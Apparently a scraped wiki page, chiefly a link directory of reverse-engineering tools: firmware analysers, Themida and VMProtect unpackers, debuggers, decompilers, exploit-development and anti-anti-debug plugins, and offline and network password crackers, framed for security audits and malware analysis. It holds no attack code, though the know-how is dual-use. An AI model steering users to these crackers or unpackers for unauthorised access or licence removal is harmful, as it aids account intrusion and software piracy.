*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.

*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.

*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.

*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.

=====Video Recording and Live Streaming=====

*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.

*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.

====Search engine (self-hosted & open-source)====
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches.

*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy.

*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.

*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.

====Social Network / Fediverse (self-hosted & open-source)====

*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].

*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.

*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.

*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.

====Privacy-focused Software Directory====

*[https://prism-break.org/ prism-break.org] - is a website that provides a curated list of free and open-source software (FOSS) alternatives to proprietary, surveillance-prone services. It aims to help users opt out of global data surveillance programs—like PRISM, XKeyscore, and Tempora—by promoting privacy-respecting technology for operating systems, browsers, and communication tools.

==Education==

:[[:Literature|See the literature wiki page for all the resources.]]

Software Tools

2026-04-04T17:51:54Z

Polymorphic7: add XEP-0384: OMEMO Encryption + client

[[File:Software_wiki_banner.png|frameless|1280x300px]]

Disassemblers, decompilers, software development tools, pcb development suites, cryptographic tools, and other reverse engineering software. If you used it while reverse engineering, list it here!
==Tool Index==
 

====RF Signals Analysis====

*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.

*[https://www.gnuradio.org/ GNU Radio] - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.

*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.

*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -> Import –> Raw Data -> Radio Wave File)

----

====Firmware Analysis====

*[https://github.com/ReFirmLabs/binwalk binwalk] - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.

*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.

*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.

*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.

*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!

====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====

*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.

*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] - is a tool designed to extract files from any type of extractable file.

*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.

*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.

=====Themida Reverse Engineering=====

*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.

*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.

*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.

=====VMProtect Reverse Engineering=====

======VMProtect 2======

*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)
*vmassembler (VMProtect 2 Virtual Instruction Assembler)
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)
*vmhook (VMProtect 2 Virtual Machine Hooking Library)
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)
*vmdevirt (VMProtect Devirtualization)

======VMProtect 3======

*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).
*vmdevirt (VMProtect 3 Static Devirtualization)
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)

=====Code Virtualizer (Oreans Technologies)=====

*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.

=====Enigma Protector=====

*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.

======OllyDbg Scripts======
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]

=====Generic Code Virtualizer=====

*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.

====Reverse Engineering Toolkit AIO====
=====Windows‑focused=====
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit "All-In-One", Built for Security (Malware analysis, Penetration testing) & Educational purposes.
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.

=====Android‑focused=====
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...

====Binary PE Analysis / Editor (Windows)====

*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers. [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com

*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated "DIE" is a program for determining types of files. "DIE" is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.

*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.

*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.

*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!

*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.

*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.

*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.

*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).

====Hex Editors====

*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.

*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.

*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.

*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.

====Pattern Matching / Pattern Searching====

*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.

*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.

*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.

*[https://github.com/stefankueng/grepWin grepWin] - is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.

*[https://astrogrep.sourceforge.net/ AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a "context" feature which is very nice for looking at source code.

====Comparison Tools (Binary differences)====

*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.

*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.

*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.

*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.

*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.

*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).

====IAT Reconstructors (Windows)====

*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.

====Process Monitors (Windows)====

*[https://github.com/winsiderss/systeminformer/ System Informer] - is a free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.

*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.

====Process Dumpers (Windows)====

*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.

*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.

====API monitoring ring3 (Windows)====

*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.

*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.

====Hashing & Crypto====
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills. 
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.

*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.

*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.

====Password cracking====
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.

Offline
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).

*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.

Online (network based bruteforce in LAN).
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.

*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.

*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.

====Virtualization technology (host isolation) or sandboxes====

*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.

*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production.

*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.

*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local & mapped drives or the Windows registry.

*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. "If you implement boundaries and nobody is around to push them, do they even exist?". Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?

*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.

*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.

*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.

*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.

*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.
----

====Dynamic & Static Analysis (mostly '''unmanged''' binaries)====

=====Interactive Disassemblers ('''static analysis''')=====

*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.

::Binary Ninja Scripts/Plugins/Extension
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.

*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].

::Ghidra Scripts/Plugins/Extension
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm & MIPS scripts] - ARM & MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.
:::*Qt Framework
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled & compiled with MSVC.
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.

*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.

::IDA Scripts/Plugins/Extension
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.
::::*Oreans CV scripts
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.
::IDA LLM Plugins
:::*Local (quantized LLMs Q4/INT4)
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.
:::*Cloud
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.

*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).

*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)

*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.

*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.

*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.

*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.

*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.

=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====

*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework. Includes Disassembler, Debugger, Emulation and Symbolik analysis engines. Includes built-in Server and Shared-Workspace functionality. Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism). Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA. Criticisms (from a core dev): "Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better. PR's and suggestions welcome." Best installed via Pip: <code>python3 -m pip install vivisect</code>

*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)

*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).

*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.

::OllyDbg Scripts/Plugins/Mods
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.

*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.

::x64dbg Plugins/Integrations/Templates
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.
:::*[[Media:Oreans oep finder uni.zip]] - OEP Finder python script (Universal=works for "all" versions); Tested on 2.3.0.0, 2.3.5.10, 3.0.8.0.

*[https://github.com/mandiant/rvmi rVMI] - is a debugger on steroids. It leverages Virtual Machine Introspection (VMI) and memory forensics to provide full system analysis. This means that an analyst can inspect userspace processes, kernel drivers, and pre-boot environments in a single tool.

*[https://www.sourceware.org/gdb/ GDB] - the GNU Project debugger, allows you to see what is going on `inside' another program while it executes, or what another program was doing at the moment it crashed.

::GDB Plugins/Integrations/Templates
:::*[https://github.com/pwndbg/pwndbg pwndbg] - is a GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.

*[https://github.com/eteran/edb-debugger edb] - is a cross platform AArch32/x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on AArch32, x86, and x86-64 as well as multiple OS's.

====Debugging and Profiling dynamic analysis (Linux)====

*[https://valgrind.org/ Valgrind] - is a GPL'd system for debugging and profiling Linux programs. With Valgrind's tool suite you can automatically detect many memory management and threading bugs, avoiding hours of frustrating bug-hunting, making your programs more stable.

*[https://libcsdbg.sourceforge.net/jTracer/ jTracer] - is a stack trace visualization utility for libcsdbg. In other words, it acts as a TCP/IP server for libcsdbg clients, that connect to it and transfer their trace data, either C++ exception stack traces or generic thread stack traces and whole process stack dumps.

*[https://github.com/koute/bytehound Bytehound] - is a memory profiler tool for Linux designed to help developers analyze memory usage and find leaks in their applications.

*[https://github.com/strace/strace strace] - is a diagnostic, debugging and instructional userspace utility for Linux.

*[https://github.com/rr-debugger/rr rr Record and Replay Framework] - is a lightweight tool for recording, replaying and debugging execution of applications (trees of processes and threads). Debugging extends gdb with very efficient reverse-execution, which in combination with standard gdb/x86 features like hardware data watchpoints, makes debugging much more fun.

*[https://github.com/lornix/fenris fenris] - is a program execution path analysis tool suitable for black-box code audits and algorithm analysis. It's useful for tracking down bugs and evaluating security subsystems.

====Debuggers / Disassemblers / Decompilers for '''managed''' binaries====

=====.NET (CLR)=====

*[https://github.com/dnSpyEx/dnSpy dnSpyEx (newly maintained repo & '''added features''')] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/dnSpy/dnSpy dnSpy (archived repo)] - is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available.
*[https://github.com/icedland/iced Iced] - Blazing fast and correct x86/x64 disassembler, assembler, decoder, encoder for Rust, .NET, Java, Python, Lua.
*[https://github.com/icsharpcode/ILSpy ILSpy] - NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!
*[https://www.telerik.com/products/decompiler.aspx Telerik JustDecompile] - is a free .NET decompiler and assembly browser that makes high-quality .NET decompilation easy With an open source decompilation engine.

======.NET deobfuscators======

::*[https://github.com/ViRb3/de4dot-cex de4dot CEx] - is a deobfuscator based on de4dot with full support for vanilla ConfuserEx.
::*[https://github.com/de4dot/de4dot de4dot] - is a .NET deobfuscator and unpacker.
::*[https://github.com/NotPrab/.NET-Deobfuscator Lists of .NET deobfuscators and unpackers (Open Source)] - A curated list of open source deobfuscators and more.

======.NET memory dumpers======

::*[https://github.com/wwh1004/ExtremeDumper ExtremeDumper] - is a .NET Assembly Dumper (source code available).
